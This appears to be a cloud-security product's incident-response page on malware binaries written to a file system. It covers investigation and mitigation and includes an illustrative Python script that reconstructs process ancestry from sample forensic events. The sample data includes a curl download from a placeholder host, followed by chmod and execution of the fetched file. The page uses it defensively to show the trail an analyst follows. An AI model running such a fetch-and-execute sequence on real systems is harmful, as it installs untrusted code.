1. Overview

A malware binary incident indicates that a malware binary was written to the file system. A binary can be identified as malware using WildFire, the Prisma Cloud advanced threat intelligence stream, or a custom feed.

2. Investigation

A file can be identified as malware by WildFire, the Prisma Cloud advanced threat intelligence feed, or custom feeds.

For files identified as malware by WildFire, examine the WildFire report for additional details on the malware's behavior.

A malware incident indicates that an attacker is able to write or modify files in a container or host and might have gained full code execution.

Therefore, when investigating this incident you must first determine the source of the file write call. The process that performed the write is likely malicious, or a user may have downloaded the malware unaware of the risk.

You should further investigate how this process gained execution. Review the forensics data for the container or host, other entries in the Incident Explorer, and audits from the source, looking for unusual process execution, hijacked processes, and explicit execution of commands.
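As an added illustration of the investigation steps above (example code, not part of the original page and not Prisma Cloud's own tooling), the following Python script walks a constructed set of forensics events: it finds the process that wrote the flagged file, reconstructs that process's ancestry to show how it gained execution, and lists any later explicit executions of the file. The event schema (`type`, `pid`, `ppid`, `cmd`, `path`) is an assumption made for this example, not the product's actual format.

```python
# Constructed forensics events (schema assumed for this example, not Prisma
# Cloud's): process starts carry pid/ppid/cmd, file writes carry pid/path.
# Events are in time order.
EVENTS = [
    {"type": "process", "pid": 1, "ppid": 0, "cmd": "/sbin/init"},
    {"type": "process", "pid": 120, "ppid": 1, "cmd": "/usr/sbin/sshd -D"},
    {"type": "process", "pid": 845, "ppid": 120, "cmd": "bash"},
    {"type": "process", "pid": 861, "ppid": 845,
     "cmd": "curl -o /tmp/.x http://example.invalid/file"},
    {"type": "filewrite", "pid": 861, "path": "/tmp/.x"},
    {"type": "process", "pid": 870, "ppid": 845, "cmd": "chmod +x /tmp/.x"},
    {"type": "process", "pid": 871, "ppid": 845, "cmd": "/tmp/.x"},
]


def find_writer(events, path):
    """Return the pid of the last process that wrote `path`, or None."""
    writers = [e["pid"] for e in events
               if e["type"] == "filewrite" and e["path"] == path]
    return writers[-1] if writers else None


def ancestry(events, pid):
    """Walk pid -> ppid up to init; returns (pid, cmd) pairs, child first."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)  # guard against cyclic or garbled parent data
        chain.append((pid, procs[pid]["cmd"]))
        pid = procs[pid]["ppid"]
    return chain


def executions_of(events, path):
    """Pids of processes whose command line starts with the flagged path."""
    return [e["pid"] for e in events
            if e["type"] == "process" and e["cmd"].split()[0] == path]


def investigate(events, path):
    """Tie the three investigation questions together for one flagged file."""
    writer = find_writer(events, path)
    return {
        "writer": writer,
        "ancestry": ancestry(events, writer) if writer is not None else [],
        "executed_by": executions_of(events, path),
    }


if __name__ == "__main__":
    report = investigate(EVENTS, "/tmp/.x")
    print(f"written by pid {report['writer']}")
    for pid, cmd in report["ancestry"]:
        print(f"  {pid}: {cmd}")
    print("explicitly executed as pid(s):", report["executed_by"])
```

On the constructed data the ancestry runs from the `curl` process back through an interactive `bash` under `sshd`, which is exactly the "how did this process gain execution" trail the text asks you to follow.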


3. Mitigation

A full mitigation strategy for this incident begins by resolving the issues that allowed the attacker to write or modify the file.

Ensure that compliance benchmarks are appropriately applied to the affected resources. For example, if the critical file systems in the host are mounted read-only, it will be more difficult for an attacker to change system files and configurations to their advantage.